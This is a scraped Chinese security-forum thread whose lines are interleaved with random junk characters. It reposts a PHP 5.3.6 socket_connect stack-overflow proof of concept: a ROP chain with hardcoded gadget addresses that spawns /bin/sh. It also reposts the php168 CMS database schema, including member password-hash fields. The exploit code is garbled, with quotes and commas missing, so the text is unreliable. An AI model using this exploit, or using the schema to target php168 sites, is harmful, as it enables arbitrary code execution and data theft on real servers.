最近看过此主题的会员

返回列表 发帖

关于在本网站发布非法信息的处理通知!

非安全中国网管理组对于发布非法信息的用户一律封禁处理,删除全部帖子并清理此人在论坛的全部权限,相应的群对应用户一并清理,永久不在接收注册申请!同时本管理组保留一切技术手段取证并上报相关单位,引起的后果自负!
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

我在顶贴~!狂顶狂顶。~
% B$ Z  v$ O8 e1 }. n* ]# D. j" T. I0 L" w# h) t

0 `; Z. H! h% G+ B8 m
; C1 P6 G: S5 q5 g& V  E% z5 z( L
2 ^' Z* E# y* `6 Z$ r
1 z& ~$ b% D" _1 I* z# f
, S2 n4 l* F0 i2 `- d3 B$ h( Y* I; H/ u; w" t( \

! h$ b, T0 ^0 r
( C& L, P, O; f' G3 K, X: V! M! o- }
% K3 I8 D3 D. `5 b  k9 C

/ @. e1 {0 I+ p, F$ I2 n$ q; D2 ]# _& Y1 b# u" o
7 C, u, Y' b2 m) t) ?5 r4 s

$ r* L! d* N* v  E
  T: _" E8 i: r5 c6 v* `% \( J: H$ }0 z) Q% {, r
: U, N# U& W: n4 ~2 u3 {* d! o
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

怎么就没人拜我为偶像那?? ~. g! M( a" ~+ R

9 B: i& _7 O4 @- q8 x9 Q0 W+ y4 b( I/ \9 L7 B2 Z+ z

+ Q2 [3 Z2 \4 t6 S/ ^1 W4 q# M! P7 T4 {8 d

% L0 f4 e0 n! q; Q9 V2 v1 k& b" J1 e! m9 `

8 _% o' u% {! Z; U; x8 C9 \$ |9 k
# d9 {+ e) S' H- [" M2 R& @
1 d6 [1 {: i' Q/ C# x- U0 ?; [
- b4 z/ U6 y$ D/ o, _7 u% a" H. Q9 Y) _- U( N# @# x
4 Z& U1 v6 _( k
# |2 g+ Y5 \* q( i/ T
6 c2 s9 Z) I' Y6 W7 N. R6 |, \6 h0 G

  t/ x4 V) c. F
, G+ W; t* \9 h, z) Z) ?; x, c3 a% R& U6 l" q
0 U/ {3 h" e2 i. H: N
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

PHP 5.3.6缓冲区溢出漏洞POC

1 F" R7 O2 T3 _  u" e! W
3 M0 `. u( l  Q2 a+ n6 T+ y. `* |. C8 k* b) X# S
<?php, e1 k9 L( @: G
9 e% [; [4 r, b+ d) `
/* ' {( m, M( w' r: R
3 l. N9 F- F- x) N/ d, T. a
** xiaolandjj@qq.com
9 s# ^- n" ]4 r5 A
7 O7 y/ D& t  w7 K; `4 D** http://www.t00ls.net5 O* O& g; m/ u* i" w0 q* K4 x8 z
) Z* K8 N  L; H/ y$ D* ~, x! b4 `
** 2011-07-1
, ?1 U! N/ I' p- t. C. o* L
% Z" X$ _, v1 j1 A) J& M** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c - S# H9 B' \1 y+ v  `
7 }; h! v/ y0 I0 r6 J5 K8 u; |
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary 8 |9 t: f0 S0 [& o5 e5 C& `2 v

; x( z5 c: O8 U! V+ k** code via a long pathname for a UNIX socket.8 M  ~# l1 }, Y4 \4 ?
* X! A  b% b1 ]
** by:小兰
/ {7 t( S. v* y6 i; z' Y+ g! q- [0 b
** 改版的统统木jj
  {+ p$ C- u7 z* e: N  |% @6 S) P, O, D, f: z( O
*/
7 P% a  o8 p8 M6 t- T+ B2 y3 O2 }" _- z* D- r4 K

( d9 T. y0 m& i3 a' `3 S: o  t$ J( H2 W! I+ m
echo [+] PHP 5.3.6 Buffer Overflow PoC (ROP)
5 d1 d4 m/ y) k/ A7 M6 f; s;
+ t3 }4 f  Q: N& k  [$ S' Q! l0 z8 x3 N6 f* N
echo [+] CVE-2011-19385 ~# r0 i1 h+ s7 B0 i% _

+ \0 a$ h5 O8 ^$ q9 f; 5 P$ S, q  u3 F# @7 V2 {

; f( y6 C7 B4 x! E7 `# Gadgets in /usr/bin/php ( |: {+ D! U8 r  u
* D0 M" x- `9 I
define(DUMMY x42x42x42x42); // padding 8 M2 A' M0 l  N0 H! l# g
4 k# f% q; \# {/ x; q& L
define(STACK x20xbax74x08); // .data 0x46a0 0x874ba20
& }- Y' N' B7 z) f/ s) ^+ n" J: C  J( j
define(STACK4 x24xbax74x08); // STACK + 4/ u2 t( }: y( }0 h
& s- n  k3 q3 G8 |5 ~) B; T
define(STACK8 x28xbax74x08); // STACK + 8 9 W$ \! k5 [' k0 J, r+ B7 d: H- m
5 R8 t* V5 A: Z! r& B( i# z
define(STACK12 x3cxbax74x08); // STACK + 12
! k1 e1 A$ U" }' ^% @& P  J
& T# m7 T; H( R! A( q9 rdefine(INT_80 x27xb6x07x08); // 0x0807b627: int $0x80
9 Z; x9 @0 t% C( i; D# O4 u6 L
7 k5 r7 f; ]$ B  z- \define(INC_EAX x66x50x0fx08); // 0x080f5066: inc %eax | ret
& n9 i' c4 Q- i! t* v8 l7 [; p9 S
define(XOR_EAX x60xb4x09x08); // 0x0809b460: xor %eax%eax | ret
" A) i4 ]' y' Q3 ?
; ~8 I2 z- L) L( T) L- h* rdefine(MOV_A_D x84x3ex12x08); // 0x08123e84: mov %eax(%edx) | ret
: l5 E1 a  D0 d; e* `8 s8 }  z& H4 u  l$ D+ a
define(POP_EBP xc7x48x06x08); // 0x080648c7: pop %ebp | ret # F. E  g2 {2 ~: D8 `
) Y% T6 ]# m) ^' M
define(MOV_B_A x18x45x06x08); // 0x08064518: mov %ebp%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret $ `9 p9 H9 ^" g( _4 N. i
  n: X+ g+ a) ]
define(MOV_DI_DX x20x26x07x08); // 0x08072620: mov %edi%edx | pop %esi | pop %edi | pop %ebp | ret
0 M# Y1 u+ D1 }. S& @* _
- ?& x( J6 e6 J: I! @4 fdefine(POP_EDI x23x26x07x08); // 0x08072623: pop %edi | pop %ebp | ret  M# f/ y9 k+ ]+ F; T' o6 v% H. t% [
- Y8 w9 J* D* a4 x9 N
define(POP_EBX x0fx4dx21x08); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
& Y; [  p) G9 B1 {
* x% [3 x$ t, Q! F$ pdefine(XOR_ECX xe3x3bx1fx08); // 0x081f3be3: xor %ecx%ecx | pop %ebx | mov %ecx%eax | pop %esi | pop %edi | pop %ebp | ret+ k+ Y% d4 m7 s! K( C
" N" u- d( @) [! H4 I; O% y

$ J( n1 ?. ]5 H! s* F
7 v8 X+ Z) x# p$ {- c$padd = str_repeat(A 196);2 V3 O9 R' P, S

. w+ A" J9 }7 v, P
5 z  L% Y% e5 g; ]$payload = POP_EDI. // pop %edi. Y9 M" u4 K: S
2 Q: T) }9 {; _. d7 i
STACK. // 0x874ba20
# V. o& Y9 y5 I  K% W+ ?0 M( Z- J7 a% V4 \7 X' K* O
DUMMY. // pop %ebp
/ o' V# Q# f' F9 t1 A" k% [* N! |* k. \
MOV_DI_DX. // mov %edi%edx
# v0 S9 F/ ?. C4 J2 y$ M- A' T. V: M' ?/ I5 S0 a& I
DUMMY. // pop %esi$ G. Q/ A+ D0 J* k0 h

9 D, ]: v, `% W  u; [DUMMY. // pop %edi! D# ?, X$ F% ^, \- j# [+ u+ b! e9 q
+ B$ z/ Y4 k) C
//bi. // pop %ebp& b8 U* }( D' y4 u  B- y+ L6 o
9 T, j* W$ `5 V. U+ }9 f
MOV_B_A. // mov %ebp%eax 0 c4 ^5 O7 k4 q7 q/ I1 U% F- P) c
) D1 f1 y1 A0 c& x% f. _
DUMMY. // pop %ebx
" |$ N$ C0 P; v) b' W! T$ O" w5 X5 e# F' j3 S6 `
DUMMY. // pop %esi: M: s2 T% m. d
% N, o. S, z1 i/ [
DUMMY. // pop %edi3 L# R; z1 ^' y" n* o2 t
. O5 H( ^+ q6 G: Q- C
DUMMY. // pop %ebp 0 E6 q4 d5 d' I
3 o1 r7 C. b( j. n( D
MOV_A_D. // mov %eax(%edx) ) E. h" |% b1 L" ~) Q2 d

2 H: H5 w5 x1 [! k, Q: gPOP_EDI. // pop %edi- K/ u4 }, x+ }* u9 r( B
, Q' Q  m' l# [2 {0 z& c! l
STACK4. // 0x874ba24
: K* W: L0 Y- N, U& W& J3 l3 K
) x8 E" Y& x  dDUMMY. // pop %ebp& B; Z  R! N9 G6 z- R- m5 a

% H$ H1 f! H8 r" S: `. nMOV_DI_DX. // mov %edi%edx
! E8 d/ Z- h/ [" h# @
; E4 i- @. R. \4 z% I5 wDUMMY. // pop %esi
( w' G+ o7 L# X) h; g4 d$ ]4 _2 L, o5 q) a  K+ n/ a
DUMMY. // pop %edi  `; S1 z5 f" g* h
$ ~+ F$ @$ h/ k+ a* @/ e2 E% T
n/sh. // pop %ebp . f/ t1 e2 u. |" s9 C

+ c& v6 y/ J/ V8 v* \4 eMOV_B_A. // mov %ebp! w! K+ ]- A2 U4 _8 j& j
+ T: R8 B  \0 n/ S2 g7 s
DUMMY. // pop %ebx
2 Q) `' }' E; J" I1 h6 {% W
1 Y4 V& m2 A( P0 LDUMMY. // pop %esi . ^$ `( d: f  v0 A  ~
& _/ ?3 u- H: l
DUMMY. // pop %edi
2 t, B3 o: Q4 r& O. O" L( K
1 F5 O6 s! H9 H) n. iDUMMY. // pop %ebp6 ~# h2 A% z  B6 n7 }0 W* t' z

! ^' a& [! g4 i- k# l+ r% G: XMOV_A_D. // mov %eax(%edx)
2 ~! @" F# j. e7 ~4 B) u/ y" c# a. e5 W
POP_EDI. // pop %edi4 @( Z) y/ y' ?$ d

* Y" ~2 n, N. l( T" J! ]STACK8. // 0x874ba28 & i1 e5 M$ A, V& l( y$ V# a( U
+ p+ D# C! p# q0 F0 Y
DUMMY. // pop %ebp . b4 }- E- `- K9 h7 Q

" S9 I0 H/ `5 ?( OMOV_DI_DX. // mov %edi%edx + m+ L$ f3 g9 [6 h* [
0 s) X# A3 L9 e# g! h$ F0 c
DUMMY. // pop %esi
, h7 y# W' O2 Y- j0 {0 {) ?: W9 c3 I" l# n7 I# @
DUMMY. // pop %edi$ j2 g$ g1 l3 w0 r% o

4 a1 [2 V, Y  e' @* K+ b2 i  DDUMMY. // pop %ebp
1 {, K, h4 C0 p# C1 c7 o6 I5 J, j( L* ^5 U. y3 G6 o$ r; i- e
XOR_EAX. // xor %eax%eax
$ G4 X) ^/ z, _
9 a1 B$ R, p6 M0 b1 n( ?# iMOV_A_D. // mov %eax(%edx) 5 J9 A/ C% u( M4 O

' Q4 ]' h0 Z" s5 N# q) jXOR_ECX. // xor %ecx%ecx 3 [4 D* j7 E" y, C' v$ p" h

+ U, }" t( c$ HDUMMY. // pop %ebx$ e  N- ~% o0 D9 F
6 s" e" P+ R7 n$ J# i
DUMMY. // pop %esi
$ I, J/ v% X: v8 K3 G. Q' z
9 y' V& c  H( Z( PDUMMY. // pop %edi0 k/ }# h" Z7 Q7 ^. W
" ^1 B6 J1 p+ w5 z  C
DUMMY. // pop %ebp . D& u& n! \4 t$ n
3 o( Z- N1 i- g  g9 Y9 X, s& Y6 l
POP_EBX. // pop %ebx 7 N$ C' S6 ^0 P7 }& K( X$ b/ |

9 y9 D1 r: n! c  {STACK. // 0x874ba20
9 G+ P+ n$ @6 Z0 [6 r# F  o7 i/ D5 Y) x' `  V0 C% s9 E
DUMMY. // pop %esi ! ^4 W4 C1 w& w3 ~! n% J6 P3 w
0 s. q1 J/ G% O5 C
DUMMY. // pop %edi
. m* _6 H% a, i, t* [; S
8 n7 m* K- n5 Y8 ZDUMMY. // pop %ebp2 U+ H2 U9 v' x! [

5 i" T# g5 h# `XOR_EAX. // xor %eax%eax , M) v9 g6 `3 w

- H. z6 p9 \! R$ Q9 |+ AINC_EAX. // inc %eax
* @9 V/ p* b+ C; v2 |' Q0 m& o1 |" ^. O1 Y. c
INC_EAX. // inc %eax
0 B! Y4 t; b* I6 J' z
. @; N, [4 E) Y9 Y" RINC_EAX. // inc %eax
% l) E7 x1 e- K2 p( ^4 p7 M, A- z  `7 p+ U9 i! [* w+ s
INC_EAX. // inc %eax; i0 Z7 M' n7 ~5 `, x5 ?- |7 j8 b
' b# e- Q: p* H: u- m
INC_EAX. // inc %eax
5 |+ k' S: Y& L+ F6 k) ?6 [# F- @9 D' u4 }  s$ E* c# W
INC_EAX. // inc %eax # w# l: M* m5 x
5 d# u4 i: W5 a+ `) H8 a  ~5 V
INC_EAX. // inc %eax- Z  r' L( z- d3 j2 P
/ P4 R7 C* S; y, F2 t
INC_EAX. // inc %eax' d& b; a1 [; v7 m
$ K' z% ^* c. D: Y# `
INC_EAX. // inc %eax
" H: I6 \* f# x' g( ~
7 n1 p  O4 K8 Z7 X2 q7 JINC_EAX. // inc %eax3 Y* d$ W) p4 ~. d0 f

  W) H  ?/ r# V/ K+ `& U$ @INC_EAX. // inc %eax
, M; ~1 a6 O& J6 v# Q) j% j' F$ g8 X) Y1 F$ P
INT_80; // int $0x80
* Y! ^3 O4 O; w
. v1 J, x' }5 |# _$evil = $padd.$payload; % e/ {" D# _3 C# K/ I* L

1 T' i" C  o! Y! Y/ n* v" z. t$ }/ i6 g' E$ _: B  ~
, w$ X4 t, f$ X; a7 e+ `- `
$fd = socket_create(AF_UNIX SOCK_STREAM 1); : `( d; Q1 |9 I  p# C+ F
8 W) w3 \* Z$ ]/ B. ~
$ret = socket_connect($fd $evil); 7 G" L5 J/ {6 k( h

$ [# M5 u" M" P) J?> 复制代码
7 |! i3 T1 X" w+ I/ r. a  t1 @0 z% V# a2 e
: ]( `4 p9 }$ p% i6 E  T' h8 S. P( Z

+ H+ T3 ?) f) [7 y. d! A" J9 v* y# Z7 e+ f& X+ \9 ?
: L9 k5 @6 n) [/ S( }5 [/ R

  h0 ^4 S# S% y& l
2 E7 \% y; R; q, a. R2 S" o; y5 V
+ ?2 V8 a4 e0 f& f
/ C2 [% U, M  A0 n0 v) e9 G* l' v) c" `7 h/ K9 C6 ?% j

; u$ e, |7 F- o4 T  d* S  G5 G0 u. [" o/ X

2 L/ h5 _% K8 }$ J. {9 t
# L$ D7 q! I0 R1 w8 u
5 T3 H* d$ q  e; b9 x0 b
# G0 T' g0 l( Q2 L7 h  k0 I) g: ~) l5 _4 Z

# ^, Y3 K8 J5 d; B公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

php168整站数据表结构
p8_article  文章标题表    aid  mediumint(7)  UNSIGNED 否    auto_increment      ---文章ID           title  varchar(150)   否             ---完整标题,必填        smalltitle  varchar(100)   否        ---短标题,少用             fid  mediumint(7)  UNSIGNED 否  0    ---栏目FID,必填                mid  mediumint(5)   否  0            ---所属模型,必填,如图片,下载       fname  varchar(50)   否              ---栏目名称,必填        hits  mediumint(7)   否  0           ---点击率        pages  smallint(4)   否  0           ---文章有几页        comments  mediumint(7)   否  0       ---评论数            posttime  int(10)   否  0            ---发布日期       list  int(10)   否  0                ---默认排序值    uid  mediumint(7)   否  0            ---发布者UID       username  varchar(30)   否           ---发布者帐号          author  varchar(30)   否             ---文章作者        copyfrom  varchar(100)   否          ---文章来源于           copyfromurl  varchar(150)   否       ---文章来源网址              titlecolor  varchar(15)   否         ---标题颜色            fonttype  tinyint(1)   否  0         ---标题是否加粗          titleicon  smallint(3)   否  0       ---标题图标(未使用)            picurl  varchar(150)   否  0         ---缩略图网址          ispic  tinyint(1)   否  0            ---是否有缩略图       yz  tinyint(1)   否  0               ---是否已审核,必填     yzer  varchar(30)   否               ---审核员      yztime  int(10)   否  0              ---审核时间     levels  tinyint(2)   否  0           ---是否推荐        levelstime  int(10)   否  0          ---推荐日期         keywords  varchar(100)   否          ---关键字           jumpurl  varchar(150)   否           ---跳转网址          iframeurl  varchar(150)   否         ---框架网址            style  varchar(15)   否              ---文章使用的风格       template  varchar(255)   否          ---文章使用的模板           target  tinyint(1)   否  0           ---是否新窗口打开        ip  varchar(15)   否                 ---发布者的IP    lastfid  mediumint(7)   否  0        ---文章删除前的IP           money  mediumint(7)   否  0          ---出售值         buyuser  text   否                  ----购买者    passwd  varchar(32)   否             ---密码        allowdown  varchar(150)   否         ---允许下载的用户组            allowview  varchar(150)   否         ---允许查看的用户组            editer  varchar(30)   否             ---最后修改文章的管理员        edittime  int(10)   否  0            ---最后修改文章的日期       begintime  int(10)   否  0           ---文章最早浏览日期        endtime  int(10)   否  0             ---文章结束浏览日期      description  text   否               ---文章描述      lastview  int(10)   否  0            ---文章最后被访问日期       digg_num  mediumint(7)   否  0       ---顶客次数            digg_time  int(10)   否  0           ---最后一次顶客时间        forbidcomment  tinyint(1)   否  0    ---是否禁止评论               ifvote  tinyint(1)   否  0           ---是否有投票        heart  varchar(255)   否             ---心情投票        htmlname  varchar(100)   否          ---静态页文件名       ================================== p8_reply   文章内容表    rid  mediumint(7)   否    auto_increment         ---内容递加ID,跟文章ID是两回事.这个不重要的       subhead  varchar(150)   否                  ---每篇内容的标题,不重要,一般为空    postdate  int(10)   否  0       ---每篇内容的发布日期,不太重要    aid  mediumint(7)   否  0                   ---文章ID,重要,必填    fid  mediumint(7)   否  0                   ---栏目FID,重要,必填    uid  mediumint(7)   否  0                   ---发布者UID    topic  tinyint(1)   否  0                   ---是否是第一页,第一页必须是1,对于多页,其它时候为0    ishtml  tinyint(1)   否  1                  ---一般为1,使用了在线编辑器    download  text   否                         ---没使用到    content  mediumtext   否                    ---文章内容    orderid  mediumint(7)   否  0               ---对于多页,页码排序,可为空 ==================================================== p8_sort  栏目表    fid  mediumint(7)  UNSIGNED 否    auto_increment   栏目FID              fup  mediumint(7)  UNSIGNED 否  0                父栏目FID    fmid  mediumint(5)   否  0                所属模型ID    name  varchar(50)   否                  栏目名称    class  smallint(4)   否  0               当前栏目属于第几级    sons  smallint(4)   否  0                当前分类有几个子栏目    type  tinyint(1)   否  0                0是分类,1是栏目,2是单篇文章    admin  varchar(100)   否                栏目管理员     list  int(10)   否  0                栏目排序值    listorder  tinyint(2)   否  0         栏目内容排序方式          passwd  varchar(32)   否               栏目密码      logo  varchar(150)   否                 栏目LOGO图片    descrip  text   否                  栏目描述    style  varchar(50)   否              栏目风格       template  text   否                  栏目与内容页使用的模板    jumpurl  varchar(150)   否           栏目跳转网址          maxperpage  tinyint(3)   否  0       栏目内容每页显示多少条            metakeywords  varchar(255)   否      SEO关键字               metadescription  varchar(255)   否    SEO描述                 allowcomment  tinyint(1)   否  0      栏目内容是否开启评论             allowpost  varchar(150)   否           允许投稿的用户组          allowviewtitle  varchar(150)   否      允许查看标题的用户组               allowviewcontent  varchar(150)   否               允许查看内容的用户组    allowdownload  varchar(150)   否               允许下载附件的用户组      forbidshow  tinyint(1)   否  0                是否禁止在父栏目显示本子栏目的部分内容    config  text   否                  备用,扩展    list_html  varchar(255)   否         列表页的静态网页文件名格式            bencandy_html  varchar(255)   否       内容页的静态网页文件名格式              domain  varchar(150)   否                  栏目绑定的域名,生成静态后,才可以绑定    domain_dir  varchar(100)   否               栏目静态生成在哪个目录  ================================================== p8_article_db   文章内容ID总索引,方便分表处理.别无其它用途.但又必须要有的.每发表一篇文章.必须在这里插入一条记录.方便今后的分表使用. aid  int(10)   否    auto_increment             文章ID ====================================================== p8_article_module       内容模型的配置文件,字段配置参数,如图片,下载    id  smallint(4)   否    auto_increment  模型ID               name  varchar(50)   否                  模型名称    alias  varchar(30)   否                  模型别名    list  smallint(4)   否  0                模型排序值,不重要    allowpost  varchar(255)   否              允许在此模型发布内容的用户组       style  varchar(30)   否                  模型风格    template  varchar(255)   否               模型所使用的模板      config  mediumtext   否                  模型字段及其它参数配置文件    keywords  varchar(30)   否               模型关键字      ifclose  tinyint(1)   否  0              模型是否启用     iftable  mediumint(4)   否  0             模型是否分表 ================================================== p8_comment 文章评论表    cid  mediumint(7)  UNSIGNED 否    auto_increment     评论内容的ID            aid  int(10)  UNSIGNED 否  0                被评论文章的ID    fid  mediumint(7)  UNSIGNED 否  0                被评论文章的FID    authorid  mediumint(7)   否  0                被评论文章的作者ID    uid  mediumint(7)  UNSIGNED 否  0                评论者的ID    username  varchar(30)   否                  评论者的帐号    posttime  int(10)   否  0                评论日期    content  text   否                  评论内容    ip  varchar(15)   否                 评论者的IP    icon  tinyint(3)   否  0                表情图标    yz  tinyint(1)   否  0                评论是否为审核    ifcom  tinyint(1)   否  0              是否推荐     agree  mediumint(5)   否  0             支持票数      disagree  mediumint(5)   否  0             反对票数  =============================================== p8_config 网站核心配置参数    c_key  varchar(50)   否     全局变量名                c_value  text   否                  全局变量值    c_descrip  text   否          没有使用到   ============================================================p8_members   用户通行证的表,如果整合了论坛,这个表将停用.作废,而直接使用论坛的表,作为主表   uid  mediumint(7)  UNSIGNED 否    auto_increment      用户的UID           username  varchar(30)   否                  用户的帐号   password  varchar(32)   否                 用户的密码 md5一次32位加密==============================================================p8_memberdata    用户基本资料的表   uid  mediumint(7)  UNSIGNED 否  0      用户UID             username  varchar(50)   否             用户帐号        question  varchar(32)   否             安全资料问题答案,没使用        groupid  smallint(4)   否  0            用户组ID       grouptype  tinyint(1)   否  0           是否为企业会员        groups  varchar(255)   否                归属多个用户组     yz  tinyint(1)   否  0                是否已验证   newpm  tinyint(1)   否  0               是否有短消息,没使用    medals  varchar(255)   否                勋章,没使用     money  mediumint(7)  UNSIGNED 否  0        财富积分值           totalspace  bigint(13)   否  0               空间大小    usespace  bigint(13)   否  0                已使用的空间   oltime  int(10)   否  0                在线时间,没使用   lastvist  int(10)   否  0              最后一次访问时间     lastip  varchar(15)   否                最后一次访问IP     regdate  int(10)   否  0                注册日期   regip  varchar(15)   否                  注册IP   sex  tinyint(1)   否  0                性别,1为男,2为女   bday  date   否  0000-00-00             生日      icon  varchar(150)   否                 头像    introduce  text   否                  自我介绍   hits  int(7)   否  0                空间访问量   lastview  int(10)   否  0            空间最后被访问的日期       oicq  varchar(11)   否                QQ号码     msn  varchar(50)   否                 MSN帐号    homepage  varchar(150)   否           个人主页网址          email  varchar(50)   否                邮箱     provinceid  mediumint(6)   否  0        所在省份          cityid  mediumint(7)   否  0              所在城市     address  varchar(255)   否                 联系地址    postalcode  varchar(6)   否                邮政编码     mobphone  varchar(12)   否                  手机号码   telephone  varchar(25)   否                  电话号码   idcard  varchar(20)   否                  身份证号码   truename  varchar(20)   否                  真实姓名   config  text   否                  功能扩展字段   moneycard  mediumint(7)  UNSIGNED 否  0                金币数量   email_yz  tinyint(1)   否  0                邮箱是否验证   mob_yz  tinyint(1)   否  0                手机号码是否验证   idcard_yz  tinyint(1)   否  0               身份证是否验证   =====================================================================  p8_group   用户组的表     gid  smallint(4)   否    auto_increment         用户组ID        gptype  tinyint(1)   否  0                是否为系统组,1为系统组,2为会员组   grouptitle  varchar(50)   否               用户组名称      levelnum  mediumint(7)   否  0               会员组升级积分    totalspace  int(10)   否  0                会员组可使用的空间大小   allowsearch  tinyint(1)   否  0                是否允许使用搜索   powerdb  text   否                  会员详细权限   allowadmin  tinyint(1)   否  0          是否允许进入后台         allowadmindb  text   是  NULL             后台详细权限  ===========================================================p8_label 标签使用的表   lid  int(10)   否    auto_increment             标签ID    name  varchar(100)   否                  标签名称,可为空   ch  smallint(4)   否  0                频道ID   chtype  tinyint(2)   否  0                如果头部与底部标签的话,则为99,其它为0   tag  varchar(50)   否                  标签关键字   type  varchar(30)   否                  所调用的内容类型,如文章,评论,图片,代码   typesystem  tinyint(1)   否  0            是否为系统的内容,是的话.是要从数据库MYSQL获取       code  text   否                  代码内容   divcode  text   是  NULL           层的一些配置参数,可为空        hide  tinyint(1)   否  0            是否隐藏标签不显示       js_time  int(10)   否  0             没使用      uid  mediumint(7)   否  0             更新标签的用户ID      username  varchar(30)   否               更新标签的用户帐号      posttime  int(10)   否  0               更新标签的时间    pagetype  tinyint(3)   否  0             页面类型.如主页1,列表页2,内容页 3     module  mediumint(6)   否  0              系统模型,如分类,下载     fid  mediumint(7)   否  0                调用标签那个栏目FID   if_js  tinyint(1)   否  0                是否是JS调用   style  varchar(40)   否                 当前使用的风格=========================================================p8_memberdata_1 企业资料表     uid  mediumint(7)   否  0          用户UID         cpname  varchar(50)   否           企业名称          cplogo  varchar(150)   否           企业图片标志          cptype  varchar(40)   否  0          企业性质         cptrade  varchar(40)   否             所属行业        cpproduct  varchar(255)   否          主营产品           cpcity  mediumint(7)   否  0          所在城市         cpfoundtime  varchar(20)   否           成立时间          cpfounder  varchar(20)   否             法人        cpmannum  varchar(20)   否               员工数      cpmoney  varchar(20)   否                  注册资本   cpcode  varchar(30)   否                  机构代码   cppermit  varchar(150)   否                营业执照扫描件     cpweb  varchar(150)   否                  公司网址   cppostcode  varchar(6)   否  0             邮箱编码      cptelephone  varchar(30)   否               联系电话      cpfax  varchar(30)   否                  传真号码   cpaddress  varchar(150)   否               详细地址      cplinkman  varchar(20)   否                联系人     cpmobphone  varchar(11)   否               联系手机      cpqq  varchar(11)   否                  联系QQ   cpmsn  varchar(50)   否                 联系MSN   ======================================================   p8_module      所安装的系统模块   id  mediumint(5)   否    auto_increment   分配的模块ID号              type  tinyint(1)   否  0                是否可安装多份   name  varchar(30)   否                  模块名称   pre  varchar(20)   否                  数据表前缀   dirname  varchar(30)   否                 存放目录    domain  varchar(100)   否                  使用的二级域名   admindir  varchar(20)   否                  后台目录   unite_admin  tinyint(1)   否  0             是否统一后台管理      config  text   否                  扩展   list  mediumint(5)   否  0                排序值   admingroup  varchar(150)   否             备用        adminmember  text   否                  模块管理员   unite_member  tinyint(1)   否  1          是否统一前台         unite_table  tinyint(1)   否  0           备用      ==========================================   p8_upfile用户上传的附件统计      up_id  mediumint(7)   否    auto_increment         附件ID        module_id  smallint(4)   否  0                模块系统ID   ids  varchar(255)   否  0                使用了此附件的文章ID   fid  mediumint(7)   否  0                使用了此附件的文章所在栏目ID   uid  mediumint(7)   否  0                上传者ID   posttime  int(10)   否  0                上传日期   url  varchar(150)   否                  附件存放目录   filename  varchar(100)   否                  文件名   num  smallint(5)   否  0                被使用的次数   if_tmp  tinyint(1)   否  0               备用===================================================   p8_template 公共调用的模板,如头部,底部,内容页,主页,列表页.用户可以不断添加公共调用的模板      id  mediumint(5)   否    auto_increment      分配的ID           name  varchar(50)   否                  模板名称   type  smallint(4)   否  0                哪种类型的模板,如头部,还是底部,还是主页等等   filepath  varchar(100)   否               模板路径      descrip  text   否                  描述,没使用   list  int(10)   否  0               排序值.==============================================p8_spsort  专题分类p8_special_comment  专题评论p8_special 专题内容p8_fu_sort  辅栏目分类p8_fu_article   辅栏目内容p8_channel  系统频道0 {: b9 s5 U5 j' x$ Z+ t
8 F; F$ m& t/ @' z2 i( ]0 u
8 U7 k) F* U0 Q/ w% L# a+ d
3 y0 R0 b& O( A; ]( }( e
( Q* ?1 c4 k5 q6 R
' h+ t( ~9 m! o& g" i( [% b
: r; k  |6 C, Z- z* O

7 F2 m- O. r- l% ^4 |( I/ i" s4 \; x" r4 p0 }- x' y- y
+ q3 Z2 x" ~/ B- z9 P

3 x) d! O# C9 f$ B# B* M$ a
! V) A; z$ V( g1 g: D+ f& K
3 E, }5 C" j" m
2 y$ V5 j0 n& {/ t6 i! U$ b
5 J  A1 a" [. B9 u3 v% i4 z/ E3 \

6 ~% C8 J& s6 B. v7 c! z% _8 b
8 u$ f, O% m  `# [' N; _' B# M; i  {( k6 c: }
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表